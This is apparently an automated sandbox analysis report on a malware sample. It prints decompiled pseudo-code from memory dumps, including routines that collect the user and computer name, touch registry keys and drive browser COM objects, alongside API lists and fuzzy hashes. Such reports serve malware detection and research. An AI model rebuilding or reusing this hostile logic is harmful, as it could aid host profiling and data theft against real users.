                                                                                                                          						if(E04CD4A6D(_t97,  *_t33, _t91, _a8,  *0x4cdd374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                                                                                          							_t68 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          							if(_t98 == 0) {
                                                                                                                          								_t35 = _t68 + 0x4cdea48; // 0x4d4c4b48
                                                                                                                          								_t69 = _t35;
                                                                                                                          							} else {
                                                                                                                          								_t34 = _t68 + 0x4cdea43; // 0x55434b48
                                                                                                                          								_t69 = _t34;
                                                                                                                          							}
                                                                                                                          							if(E04CD5F64(_t69,  *0x4cdd374,  *0x4cdd378,  &_a24,  &_a16) == 0) {
                                                                                                                          								if(_t98 == 0) {
                                                                                                                          									_t71 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          									_t44 = _t71 + 0x4cde83e; // 0x74666f53
                                                                                                                          									_t73 = E04CD1922(_t44, _t44);
                                                                                                                          									_t99 = _t73;
                                                                                                                          									if(_t73 == 0) {
                                                                                                                          										_v8 = 8;
                                                                                                                          									} else {
                                                                                                                          										_t47 = _t101 + 0x10; // 0x3d04cdc0
                                                                                                                          										E04CD5DDA( *_t47, _t91, _a8,  *0x4cdd378, _a24);
                                                                                                                          										_t49 = _t101 + 0x10; // 0x3d04cdc0
                                                                                                                          										E04CD5DDA( *_t49, _t91, _t99,  *0x4cdd370, _a16);
                                                                                                                          										E04CD4AAB(_t99);
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t40 = _t101 + 0x10; // 0x3d04cdc0
                                                                                                                          									E04CD5DDA( *_t40, _t91, _a8,  *0x4cdd378, _a24);
                                                                                                                          									_t43 = _t101 + 0x10; // 0x3d04cdc0
                                                                                                                          									E04CD5DDA( *_t43, _t91, _a8,  *0x4cdd370, _a16);
                                                                                                                          								}
                                                                                                                          								if( *_t101 != 0) {
                                                                                                                          									E04CD4AAB(_a24);
                                                                                                                          								} else {
                                                                                                                          									 *_t101 = _a16;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L27;
                                                                                                                          					}
                                                                                                                          					_t21 = _t101 + 0x10; // 0x3d04cdc0
                                                                                                                          					_t81 = E04CD63F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                                                                                          					if(_t81 == 0) {
                                                                                                                          						_t100 = _v16;
                                                                                                                          						if(_v12 == 0x28) {
                                                                                                                          							 *_t100 =  *_t100 & _t81;
                                                                                                                          							_t26 = _t101 + 0x10; // 0x3d04cdc0
                                                                                                                          							E04CD4A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                                                                                          						}
                                                                                                                          						E04CD4AAB(_t100);
                                                                                                                          						_t98 = _a16;
                                                                                                                          					}
                                                                                                                          					E04CD4AAB(_a24);
                                                                                                                          					goto L14;
                                                                                                                          				}
                                                                                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                          					goto L29;
                                                                                                                          				} else {
                                                                                                                          					_t97 = _a8;
                                                                                                                          					E04CDA938(_t98, _a8,  &_v284);
                                                                                                                          					__imp__(_t102 + _t98 - 0x117,  *0x4cdd37c);
                                                                                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                                                                                          					_t91 = 0x80000003;
                                                                                                                          					goto L6;
                                                                                                                          				}
                                                                                                                          			}
























                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(04CD2197,0000005F,00000000,00000000,00000104), ref: 04CD285E
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 04CD288B
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                            • Part of subcall function 04CD5DDA: lstrlenW.KERNEL32(?,?,?,04CD29F4,3D04CDC0,80000002,04CD2197,04CD258B,74666F53,4D4C4B48,04CD258B,?,3D04CDC0,80000002,04CD2197,?), ref: 04CD5DFF
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 04CD28AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                          • String ID: ($\
                                                                                                                          • API String ID: 3924217599-1512714803
                                                                                                                          • Opcode ID: 409f53618e0ec973693aad376701888c27acc0c018d682ec219e441a9d866042
                                                                                                                          • Instruction ID: f4bab0747392ef14c8ba08aecf9729d254857f9b287582985147c61ebe4c7ac6
                                                                                                                          • Opcode Fuzzy Hash: 409f53618e0ec973693aad376701888c27acc0c018d682ec219e441a9d866042
                                                                                                                          • Instruction Fuzzy Hash: 95515E7550060ABFEF22AFA0DD44EAA3BBBFF04314F048565FB1A96160D735EA15EB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF95F
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF96B
                                                                                                                            • Part of subcall function 6E2EF8E0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF998
                                                                                                                            • Part of subcall function 6E30E156: RaiseException.KERNEL32(E06D7363,00000001,00000003,6E30AF34,?,?,?,6E30AF34,?,6E376BD4), ref: 6E30E1B6
                                                                                                                          • task.LIBCPMTD ref: 6E2E73D2
                                                                                                                          • task.LIBCPMTD ref: 6E2E73E1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorExceptionRaise
                                                                                                                          • String ID: =Y.nDq6n$Dq6n
                                                                                                                          • API String ID: 2403370058-3119292408
                                                                                                                          • Opcode ID: 8732f0ee543e46bd86a60d1bb9fc9a52e1c99f85b75c58516a334cdc17230d04
                                                                                                                          • Instruction ID: 14f4071c195ca4dd88ce738d9ab30d4a443aac308d4044bc8a804487ae99cf0e
                                                                                                                          • Opcode Fuzzy Hash: 8732f0ee543e46bd86a60d1bb9fc9a52e1c99f85b75c58516a334cdc17230d04
                                                                                                                          • Instruction Fuzzy Hash: 0F412875D0021DDFDB14CFE4C890AEEFBBABF44314F508669D415AB685EB706A05CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2204710431-1686923651
                                                                                                                          • Opcode ID: 8b1d875aaf92dd5ce9a44f6825daa27c7f1bf03cc981819b9a3175fb5841eca0
                                                                                                                          • Instruction ID: 1941ddf2010f389db1c7c865bf804e96ef270fd76d89386dd51ab88276269758
                                                                                                                          • Opcode Fuzzy Hash: 8b1d875aaf92dd5ce9a44f6825daa27c7f1bf03cc981819b9a3175fb5841eca0
                                                                                                                          • Instruction Fuzzy Hash: DB2195B1944A56AFD722CFB4C45077BBEFDAB08614F04491EE499C7A41E774D602CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$InformationTimeZone
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 597776487-0
                                                                                                                          • Opcode ID: dbd61e87d20627212246f2fe25e9d7cdd6990940e95cd3b1c55e0d7751fb18eb
                                                                                                                          • Instruction ID: 2d1502a18f084dc6ed38b25d9cc42c41200cd3cfda5e2ef50d5068226a2d90f6
                                                                                                                          • Opcode Fuzzy Hash: dbd61e87d20627212246f2fe25e9d7cdd6990940e95cd3b1c55e0d7751fb18eb
                                                                                                                          • Instruction Fuzzy Hash: 57C117719042A5AFDB109FF8D850FEA7BBDAF46358F3445A9D4D0E7281E7328A42CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3033488037-0
                                                                                                                          • Opcode ID: 24b1ad0a7ac5010be7d759dd65c040dcdd0af27c881ce837d7d438505233c50f
                                                                                                                          • Instruction ID: 1fbfe1097f31ab092647670b083c3619b0f3f54f6c6aa2f80df11c6f284f7c3f
                                                                                                                          • Opcode Fuzzy Hash: 24b1ad0a7ac5010be7d759dd65c040dcdd0af27c881ce837d7d438505233c50f
                                                                                                                          • Instruction Fuzzy Hash: 8751D532A00655AFDB10DFA9DE80FAA77F8FF48724F644969E845DB250E732D901CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD137A() {
                                                                                                                          				long _v8;
                                                                                                                          				long _v12;
                                                                                                                          				int _v16;
                                                                                                                          				long _t39;
                                                                                                                          				long _t43;
                                                                                                                          				signed int _t47;
                                                                                                                          				short _t51;
                                                                                                                          				signed int _t52;
                                                                                                                          				int _t56;
                                                                                                                          				int _t57;
                                                                                                                          				char* _t64;
                                                                                                                          				short* _t67;
                                                                                                                          
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				GetUserNameW(0,  &_v8);
                                                                                                                          				_t39 = _v8;
                                                                                                                          				if(_t39 != 0) {
                                                                                                                          					_v12 = _t39;
                                                                                                                          					_v8 = 0;
                                                                                                                          					GetComputerNameW(0,  &_v8);
                                                                                                                          					_t43 = _v8;
                                                                                                                          					if(_t43 != 0) {
                                                                                                                          						_v12 = _v12 + _t43 + 2;
                                                                                                                          						_t64 = E04CD75F6(_v12 + _t43 + 2 << 2);
                                                                                                                          						if(_t64 != 0) {
                                                                                                                          							_t47 = _v12;
                                                                                                                          							_t67 = _t64 + _t47 * 2;
                                                                                                                          							_v8 = _t47;
                                                                                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                          								L7:
                                                                                                                          								E04CD4AAB(_t64);
                                                                                                                          							} else {
                                                                                                                          								_t51 = 0x40;
                                                                                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                          								_t52 = _v8;
                                                                                                                          								_v12 = _v12 - _t52;
                                                                                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                          									goto L7;
                                                                                                                          								} else {
                                                                                                                          									_t56 = _v12 + _v8;
                                                                                                                          									_t31 = _t56 + 2; // 0x4cd4565
                                                                                                                          									_v12 = _t56;
                                                                                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                          									_v8 = _t57;
                                                                                                                          									if(_t57 == 0) {
                                                                                                                          										goto L7;
                                                                                                                          									} else {
                                                                                                                          										_t64[_t57] = 0;
                                                                                                                          										_v16 = _t64;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _v16;
                                                                                                                          			}
















                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04CD4563), ref: 04CD138E
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,04CD4563), ref: 04CD13AA
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04CD4563), ref: 04CD13E4
                                                                                                                          • GetComputerNameW.KERNEL32(04CD4563,?), ref: 04CD1407
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04CD4563,00000000,04CD4565,00000000,00000000,?,?,04CD4563), ref: 04CD142A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850880919-0
                                                                                                                          • Opcode ID: 66c5a96e78e89f146f415ce2dc36ba1243a3f7849b96ae2c562d7f31a2d93d9c
                                                                                                                          • Instruction ID: 2ab07c459f88f2b8ea06cb792186c1e4ac7190dc983220ab6cba4332ff1e67df
                                                                                                                          • Opcode Fuzzy Hash: 66c5a96e78e89f146f415ce2dc36ba1243a3f7849b96ae2c562d7f31a2d93d9c
                                                                                                                          • Instruction Fuzzy Hash: D821EA76901248FFDB11DFE9D984DEEBBB9EF44304B5444AAE601E7200EB34AB45DB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 6E33CEFD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33CF0F
                                                                                                                          • _free.LIBCMT ref: 6E33CF21
                                                                                                                          • _free.LIBCMT ref: 6E33CF33
                                                                                                                          • _free.LIBCMT ref: 6E33CF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 3d12073a8b91e7d7f2039cff8759411351c58214e7ce865aa1bb7e9c12f4eb34
                                                                                                                          • Instruction ID: 374d8fbff1916a6e0f96a5ba4a2b14380913039e27eca6cdad3f9715ee7af797
                                                                                                                          • Opcode Fuzzy Hash: 3d12073a8b91e7d7f2039cff8759411351c58214e7ce865aa1bb7e9c12f4eb34
                                                                                                                          • Instruction Fuzzy Hash: B7F06735509AB49BCA40DBE8E480DDB37EDAE05614BB84C09F098DB501CB35F880CBA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD1A24(intOrPtr _a4) {
                                                                                                                          				void* _t2;
                                                                                                                          				unsigned int _t4;
                                                                                                                          				void* _t5;
                                                                                                                          				long _t6;
                                                                                                                          				void* _t7;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                          				 *0x4cdd2a4 = _t2;
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return GetLastError();
                                                                                                                          				}
                                                                                                                          				_t4 = GetVersion();
                                                                                                                          				if(_t4 != 5) {
                                                                                                                          					L4:
                                                                                                                          					if(_t15 <= 0) {
                                                                                                                          						_t5 = 0x32;
                                                                                                                          						return _t5;
                                                                                                                          					}
                                                                                                                          					L5:
                                                                                                                          					 *0x4cdd294 = _t4;
                                                                                                                          					_t6 = GetCurrentProcessId();
                                                                                                                          					 *0x4cdd290 = _t6;
                                                                                                                          					 *0x4cdd29c = _a4;
                                                                                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                          					 *0x4cdd28c = _t7;
                                                                                                                          					if(_t7 == 0) {
                                                                                                                          						 *0x4cdd28c =  *0x4cdd28c | 0xffffffff;
                                                                                                                          					}
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				if(_t4 >> 8 > 0) {
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          				_t15 = _t4 - _t4;
                                                                                                                          				goto L4;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04CD2669,?,?,00000001,?,?,?,04CD1900,?), ref: 04CD1A2C
                                                                                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD1A3B
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD1A57
                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD1A74
                                                                                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD1A93
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2270775618-0
                                                                                                                          • Opcode ID: eda39e4813541c9c751b020157b791911f0ba33c6b497ee1a614aec0b5ab04b6
                                                                                                                          • Instruction ID: 57631dbc72809218874a24822510e6be05e98ea095280f60c9e4ee391a650b39
                                                                                                                          • Opcode Fuzzy Hash: eda39e4813541c9c751b020157b791911f0ba33c6b497ee1a614aec0b5ab04b6
                                                                                                                          • Instruction Fuzzy Hash: BCF0447CA82302DBF7208F649D197397B66E704751F08462AE64BCA1C0EB78ED41DF15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Smanip$task
                                                                                                                          • String ID: .
                                                                                                                          • API String ID: 1925983085-248832578
                                                                                                                          • Opcode ID: c9f6988130762c939c20bb7d7bf4f479e1f83d5c734ac733f4935c829b97dd88
                                                                                                                          • Instruction ID: cf44b3dc242e7f47fdaa131a7a4e514e4c748a57e973c4fabb8eebf212682165
                                                                                                                          • Opcode Fuzzy Hash: c9f6988130762c939c20bb7d7bf4f479e1f83d5c734ac733f4935c829b97dd88
                                                                                                                          • Instruction Fuzzy Hash: 948151B590052CDFCF08CF98CA91FEE77BAFB45304F608999D206A7644D734AA48DB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2FDF6D
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F681A
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6837
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6854
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6866
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6879
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FDFFA
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FE014
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2939335142-1686923651
                                                                                                                          • Opcode ID: fd46dc29aa46e717099cbaed68e91b9db08437f18c3868a2ed487493ee1fb327
                                                                                                                          • Instruction ID: a20f9362983d6b8e86c141f3547390a348baead3c7da57a917bd16ac7190b91e
                                                                                                                          • Opcode Fuzzy Hash: fd46dc29aa46e717099cbaed68e91b9db08437f18c3868a2ed487493ee1fb327
                                                                                                                          • Instruction Fuzzy Hash: C42195B1944B56AFD721CFB5C450B7BBEFDAB08218F040A1EE499C7A41D734D602CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 4281374311-1686923651
                                                                                                                          • Opcode ID: adce3ed48cbb4115ba3addcc80a19f985c9e76ee97ec59757d131e5e93c82fa7
                                                                                                                          • Instruction ID: 62ab6ec2f3b82bfa3bff4b5d46d85ae4e923280f0da55ab25b009383eddcf1eb
                                                                                                                          • Opcode Fuzzy Hash: adce3ed48cbb4115ba3addcc80a19f985c9e76ee97ec59757d131e5e93c82fa7
                                                                                                                          • Instruction Fuzzy Hash: AD2181B1904A566FDB25CFB5889077BBEECAB08204F040A1AE499C7A41E734D642CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 04CD32AE
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD3393
                                                                                                                            • Part of subcall function 04CD5920: SysAllocString.OLEAUT32(04CDC2B0), ref: 04CD5970
                                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04CD33E6
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD33F5
                                                                                                                            • Part of subcall function 04CD3D39: Sleep.KERNEL32(000001F4), ref: 04CD3D81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3193056040-0
                                                                                                                          • Opcode ID: 62c39d3d539a6e17170d6780bc29abe0572fd95247a232e7c1d54f270af51023
                                                                                                                          • Instruction ID: 47f544af2880dd895d75d6ae9767568c81c020e55d2f954c27f28ce03f7ae307
                                                                                                                          • Opcode Fuzzy Hash: 62c39d3d539a6e17170d6780bc29abe0572fd95247a232e7c1d54f270af51023
                                                                                                                          • Instruction Fuzzy Hash: 12516439500649EFDB01CFA8D944A9EB7B6FF88750F148829EA05DB220DB75FD06CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E04CD5920(intOrPtr* __eax) {
                                                                                                                          				void* _v8;
                                                                                                                          				WCHAR* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				char _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				void* _v32;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				short _v48;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				short _v64;
                                                                                                                          				intOrPtr* _t54;
                                                                                                                          				intOrPtr* _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				intOrPtr* _t58;
                                                                                                                          				intOrPtr* _t60;
                                                                                                                          				void* _t61;
                                                                                                                          				intOrPtr* _t63;
                                                                                                                          				intOrPtr* _t65;
                                                                                                                          				short _t67;
                                                                                                                          				intOrPtr* _t68;
                                                                                                                          				intOrPtr* _t70;
                                                                                                                          				intOrPtr* _t72;
                                                                                                                          				intOrPtr* _t75;
                                                                                                                          				intOrPtr* _t77;
                                                                                                                          				intOrPtr _t79;
                                                                                                                          				intOrPtr* _t83;
                                                                                                                          				intOrPtr* _t87;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				intOrPtr _t109;
                                                                                                                          				void* _t118;
                                                                                                                          				void* _t122;
                                                                                                                          				void* _t123;
                                                                                                                          				intOrPtr _t130;
                                                                                                                          
                                                                                                                          				_t123 = _t122 - 0x3c;
                                                                                                                          				_push( &_v8);
                                                                                                                          				_push(__eax);
                                                                                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                          				if(_t118 >= 0) {
                                                                                                                          					_t54 = _v8;
                                                                                                                          					_t103 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t5 = _t103 + 0x4cde038; // 0x3050f485
                                                                                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                          					_t56 = _v8;
                                                                                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                          					if(_t118 >= 0) {
                                                                                                                          						__imp__#2(0x4cdc2b0);
                                                                                                                          						_v28 = _t57;
                                                                                                                          						if(_t57 == 0) {
                                                                                                                          							_t118 = 0x8007000e;
                                                                                                                          						} else {
                                                                                                                          							_t60 = _v32;
                                                                                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                          							_t87 = __imp__#6;
                                                                                                                          							_t118 = _t61;
                                                                                                                          							if(_t118 >= 0) {
                                                                                                                          								_t63 = _v24;
                                                                                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                          								if(_t118 >= 0) {
                                                                                                                          									_t130 = _v20;
                                                                                                                          									if(_t130 != 0) {
                                                                                                                          										_t67 = 3;
                                                                                                                          										_v64 = _t67;
                                                                                                                          										_v48 = _t67;
                                                                                                                          										_v56 = 0;
                                                                                                                          										_v40 = 0;
                                                                                                                          										if(_t130 > 0) {
                                                                                                                          											while(1) {
                                                                                                                          												_t68 = _v24;
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												_t123 = _t123;
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                          												if(_t118 < 0) {
                                                                                                                          													goto L16;
                                                                                                                          												}
                                                                                                                          												_t70 = _v8;
                                                                                                                          												_t109 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          												_t28 = _t109 + 0x4cde0bc; // 0x3050f1ff
                                                                                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                          												if(_t118 >= 0) {
                                                                                                                          													_t75 = _v16;
                                                                                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                          														_t79 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          														_t33 = _t79 + 0x4cde078; // 0x76006f
